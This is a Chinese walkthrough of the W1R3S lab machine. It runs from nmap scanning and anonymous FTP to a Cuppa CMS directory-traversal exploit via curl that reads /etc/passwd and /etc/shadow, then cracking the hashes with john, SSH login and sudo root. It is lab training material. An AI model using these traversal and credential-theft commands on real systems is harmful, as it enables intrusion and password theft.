首页 > 其他分享 >w1r3s靶场流程

w1r3s靶场流程

时间:2023-05-15 11:44:17浏览次数:36  
标签:.. nmap 扫描 流程 134.139 192.168 靶场 txt w1r3s

w1r3s靶场

实验环境

w1r3s靶场:192.168.134.139

kali:192.168.134.135

信息收集

利用nmap进行主机发现

nmap -sn 192.168.134.0/24

利用nmap扫描全部的端口

nmap --min-rate 10000 -p- 192.168.134.139
# –min-rate,用来指定Nmap每秒钟发送的数据包数量最小是10000
# -p-,“-p"参数指定要扫描的端口范围,默认情况下只扫描一些常见的端口号,加上”-"则表示扫描所有端口。

image

注:实战情况下为了避免受到网络等干扰,建议扫描两遍,看结果是否相同

利用nmap专门扫描这四个端口

nmap -sT -sV -O -p 21,22,80,3306 192.168.134.139
# -sT,使用TCP协议扫描,结果相对准确
# -sV,对扫描结果的版本进行判断
# -O,对操作系统进行判断
# -p,指定扫描的端口

image

UDP也可能是攻击向量,因此再扫描一遍UDP协议

nmap -sU -p 21,22,80,3306 192.168.134.139
# -sU,使用UDP协议扫描

image

用nmap的漏洞脚本找到是否有简单的突破口

nmap --script=vuln -p 21,22,80,3306 192.168.134.139
# --script=vuln扫描常见的漏洞

image

找到一个拒绝服务攻击,攻击简单粗暴,一般来说忽略

找到一个wordpress的系统,是一个非常好的攻击面

FTP

使用anonymous登录ftp,密码为空

ftp 192.168.134.139     
Connected to 192.168.134.139.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.134.139:xian_yv): anonymous
331 Please specify the password.
Password: 

image

成功登录进来了

注:进入ftp之后,首先先要将文件传输类型修改为binary,以防止传输可执行文件等时,文件损坏

ftp> binary 
200 Switching to Binary mode.

image

先将ftp服务中的文件下载下来,使用mget命令

mget 文件名

image

目录没有写权限,因此就算能执行文件但不能写入文件也达不到攻击的效果

退出ftp

ftp> exit
221 Goodbye.

image

查看下载下来的文件

cat 01.txt
cat 02.txt
cat 03.txt

image

在02.txt中发现了两段类似加过密的文字,使用hash-identifier工具判断一下其加密方式

hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce

image

这段文字很可能是md5加密

使用md5解密工具

image

hash-identifier SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

image

这段文字不是md5加密的,看起来很可能是base64加密过的

echo SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== | base64 -d

image

cat worktodo.txt

image

i don't think this is the way to root !
we have a lot of work to do,stop playing around..
cat employee-names.txt

image

得到了一些名字,说不定会有用处

HTTP

进入靶机IP

image

nmap扫描过后台有wordpress服务,但不知道具体的路径,接下来开始目录爆破

使用的工具有

gobuster
dirb
feroxbuster

使用feroxbuster工具扫描

feroxbuster -u http://192.168.134.139 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

image

发现了一些网页后台的路径,这里可以看到后台是用的wordpress这个cms,还有一个administrator的页面,这里进入试试

image

进入了cuppa CMS的安装界面,不妨安装一遍试试,点击“Next”

image

输入一些参数,默认的管理员账户密码为admin和admin,继续“Next”

image

这里提示除了管理员的账户都设置成功了,说明不能直接通过这里攻击进入系统,使用其他的方法

比如就可以测试这个安装界面有没有sql注入漏洞,经测试,并不存在

这里就先找一找有没有cuppa cms的现成的漏洞可以利用

image

只有一个结果,试试这个可不可以用

将其下载下来

image

打开

image

在浏览器中测试利用该漏洞

http://192.168.134.139/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image

网页没有回显,可能是由于编码问题或者是由于这个方法不能行

继续看漏洞的利用文件

发现其例子里使用了base64的转码,再次测试一下

image

使用curl命令来进行测试

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.134.139/administrator/alerts/alertConfigField.php

回显结果中,出现了/etc/passwd中的内容

image

该结果回复的是html源代码,使用html2text工具可以去除掉多余的html代码

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.134.139/administrator/alerts/alertConfigField.php | html2text

image

此时结果中就没有多余的html代码了

试着将/etc/shadow文件显示出来,以获取密码

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.134.139/administrator/alerts/alertConfigField.php

image

将root,www-data,w1r3s所在的行分别复制出来

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

将这些文件存入一个文件中

image

使用john解密这个文件

john hash

image

root密码太难破解,就先跳过

得到了www-data 和w1r3s的密码

靶机开启了ssh

使用获得的密码,用ssh连接w1r3s

ssh [email protected]

image

成功登录了靶机

提权

使用whoami

whoami

image

使用uname -a

uname -a

image

使用sudo -l查看权限

sudo -l

image

提权进入管理员账户

sudo /bin/bash

image

此时成为了管理员账户

进入root目录下

cd /root

image

打开flag.txt

cat flag.txt

image

标签:..,nmap,扫描,流程,134.139,192.168,靶场,txt,w1r3s
From: https://www.cnblogs.com/Xian-Yv/p/17401401.html

相关文章

  • 第139篇:微信小程序的登录流程
    好家伙,补补补 顶不住了,跑不掉了,这部分的知识还是要补上 来看看微信小程序登录的完整流程 最左边的一列就是前端负责的部分了几个关键的参数:code:一个用户登录凭证,就是一个临时的tokenAppid:appid是微信账号的唯一标识,这个是固定不变的;如果了解微信公众号开发的就需要......
  • 按照敏捷需求分析的流程
    1.用户愿景用户愿景就是满足什么样的用户在什么条件下的什么需求。如,购物网站是为了满足购物需求,社交软件是为了满足社交的需要。购物网站的社交需求,社交产品的购物需求一定是与产品的核心服务不统一的。在做需求分析时一定要多问一问是不是符合产品定位?好需求但不一定是适合的需......
  • 智能硬件项目全流程
     编辑智能硬件项目全流程阶段流程节点细分活动活动说明核心关注点市场调研市场调研收集市场需求1.目标客户群体的具体需求与痛点是什么?他们最需要什么产品与服务? 2.谁是我们的竞争对手?他们的产品优缺点及定价策略是什么?现有市场竞争态势如何?我们有什么竞争优势? 3.潜......
  • Scrum团队流程学习理解
    团队如何最大限度地发挥Scrum和敏捷的优势?回想一下,Scrum团队在Scrum的框架内定义了自己的流程。这其中包括方法、工具和互动以及如何履行Scrum角色的职责、如何使用工件和事件等。从产品管理方法到研发及质量管理方法。从团队的沟通协作方式到团队成员如何有效利用团队知识提升自......
  • C#通用框架源码 增加了机器人 流程框架 多任务流程 机器视觉源码框架,算法使用的是halc
    C#通用框架源码增加了机器人流程框架多任务流程机器视觉源码框架,算法使用的是halcon,有C#基础和Halcon基础学习这个很好提升快。ID:1515672411140814......
  • java流程控制
    流程控制用户交互java通过Scanner类来获取用户输入基本语法Scannerin=newScanner(System.in);之后通过Scanner的next()和nextLine()获取输入字符串,读取前一般用hasNext()和hasNextLine()判断是否还有输入数据Scannerin=newScanner(System.in);if(in.hasNext()){......
  • 记一次基于FPGA的VGA显示四操作数计算器工程的开发流程——(1)从顶层设计说起
    首先值得说明的是,在这个项目几乎完成之际,笔者才愈发体会到了硬件思维和软件思维的云泥之别。不幸的是,在此项目的实现过程中,绝大部分代码的思维仍然是软件思维,因此该项目主要模块的设计部分可能并不能体现硬件操作的独到之处,不符合硬件工程师的基本设计思维,所以此主题文章仅用于学......
  • 【愚公系列】2023年05月 .NET CORE工具案例-Workflow-Core轻量级工作流引擎(随机流程)
    (文章目录)前言1.什么是工作流工作流是OA系统比较重要的功能之一,主要在于企业流程协同审批,有效进行流程管理。流程管理起源于生产组织和办公自动化领域,是针对日常工作中具有固定程序的活动提出的一个概念。目的是通过将工作分解成定义良好的任务、角色,按照一定的规则和过程来......
  • Scrum团队流程之酒店管理系统
    一、产品愿景       我们的酒店管理系统旨在提供一个高效、可靠、安全的解决方案,帮助酒店提升管理效率,提供更好的服务和客户体验。我们的愿景是成为市场领先的酒店管理系统,为酒店业主和客人带来更好的价值和体验。提供一种高效、智能的酒店管理系统,帮助酒店提高客户服务质......
  • linux移植流程
    在移植Linux之前我们需要先移植一个bootloader代码,这个bootloader代码用于启动Linux内核,bootloader有很多,常用的就是U-Boot。移植好U-Boot以后再移植Linux内核,移植完Linux内核以后Linux还不能正常启动,还需要再移植一个根文件系统(rootfs),根文件系统里面包含了一些......